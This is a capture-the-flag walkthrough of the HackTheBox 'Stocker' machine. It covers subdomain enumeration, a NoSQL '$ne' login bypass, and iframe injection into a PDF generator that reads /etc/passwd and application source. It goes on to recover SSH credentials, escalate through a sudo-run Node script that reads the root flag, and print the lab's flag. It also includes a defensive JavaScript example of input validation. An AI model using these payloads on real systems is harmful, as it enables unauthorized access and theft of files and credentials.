Stocker — HackTheBox Machine Simple Writeup | 2023
HackTheBox’s New Machine — Stocker | Walkthrough | Karthikeyan Nagaraj
Make sure to Connect with the Release Arena VPN, Don’t Connect with Normal HackTheBox VPN
Analysis:
1. Let’s start with an Nmap scan
2. As usual, 2 ports are open: ssh and http.
So now let’s enumerate the http service.
3. Before we analyse the http service, make sure to add the domain stocker.htb to your /etc/hosts, as this is the domain we need to enumerate.
4. Let’s explore the host stocker.htb and look for anything interesting.
5. Now let’s enumerate subdomains using gobuster:
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u stocker.htb -t 50 --append-domain
6. Add the domain dev.stocker.htb to your hosts file.
7. Inspect the page.
We found a login page.
8. Let’s submit some dummy values and intercept that traffic.
9. Let’s change the parameter format and the Content-Type to application/json:
{"username":{"$ne":"admin"}, "password":{"$ne":"pass"}}
We got the below response; the request is redirected to /stock.
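Why the `$ne` payload above logs us in, and what stops it, as an added example that is not code from the Stocker box or the original post. It models a naive Express + MongoDB login handler: the functions only build the query filter (no database needed), so the effect of each input is visible directly; the sample bodies and the hypothetical `angoose`/`hunter2` credentials are constructed.

```javascript
// Vulnerable pattern: req.body is spliced straight into the Mongo filter.
// With Content-Type: application/json the client controls the *type* of each
// field, so {"$ne": "admin"} arrives as an object and Mongo treats it as a
// query operator ("username is not 'admin'") instead of a literal string.
function buildVulnerableFilter(body) {
  return { username: body.username, password: body.password };
}

// True when the value is a plain, bounded string with no operator semantics.
function isPlainString(value) {
  return typeof value === 'string' && value.length > 0 && value.length <= 256;
}

// Hardened pattern: refuse anything that is not a plain string, so operator
// objects ({$ne, $gt, $regex, ...}) never reach the query. Returns null on
// reject; the route handler should answer 400 Bad Request in that case.
// (Matching the password inside the query also implies plaintext storage;
// a real handler should look up by username and compare a password hash.)
function buildSafeFilter(body) {
  if (!isPlainString(body.username) || !isPlainString(body.password)) {
    return null;
  }
  return { username: body.username, password: body.password };
}

// Detection helper: true if any key at any depth starts with '$' (an operator).
// Useful in a request-logging middleware to flag injection attempts.
function containsOperator(filter) {
  if (filter === null || typeof filter !== 'object') return false;
  return Object.entries(filter).some(
    ([k, v]) => k.startsWith('$') || containsOperator(v)
  );
}

// Constructed sample bodies: the injected login from the writeup, and a normal one.
const injectedBody = { username: { $ne: 'admin' }, password: { $ne: 'pass' } };
const normalBody = { username: 'angoose', password: 'hunter2' };

console.log('vulnerable filter :', JSON.stringify(buildVulnerableFilter(injectedBody)));
console.log('operator present  :', containsOperator(buildVulnerableFilter(injectedBody)));
console.log('safe, injected    :', buildSafeFilter(injectedBody));   // null
console.log('safe, normal      :', JSON.stringify(buildSafeFilter(normalBody)));
```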
10. Now open the /stock page in the browser.
11. Add a product to the basket and click Submit Purchase. Make sure to set your proxy to intercept that traffic.
Response:
12. Let’s try to add a script to display the passwords.
13. Copy the OrderID and paste it in the browser with its corresponding link:
http://dev.stocker.htb/api/po/<orderId>
14. We are displayed with the passwords, but the size of the <iframe> is low, so let’s increase its height and width with the below code:
<iframe src=/etc/passwd height=500 width=500></iframe>
15. Now open the Order ID in the browser with the OrderID link:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
landscape:x:109:116::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
16. Send the request with the below script:
"<iframe src=file:///var/www/dev/index.js height=1000px width=1000px></iframe>"
17. We got a username and password:
username: Angoose
Password: IHeardPassphrasesArePrettySecure
18. Log in via ssh.
19. Check for any files we can run with root permission using sudo -l.
20. Let’s use the root permission to display the root flag. Create a file with nano and add the below code to display the flag:
nano flag.js
// Read /root/root.txt as the (root) user the script runs as and print it
const fs = require('fs');
fs.readFile('/root/root.txt', 'utf8', (err, data) => {
  if (err) throw err;
  console.log(data);
});
Press Ctrl+X and Shift+Y to save the file.
21. Run the js file.
We got the flag.
Flag: af0384c294f9e8a52d8ca14415973bbb
Feel Free to Ask Queries via LinkedIn and to Buy me a Coffee : )
Thank you for Reading!!
Happy Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng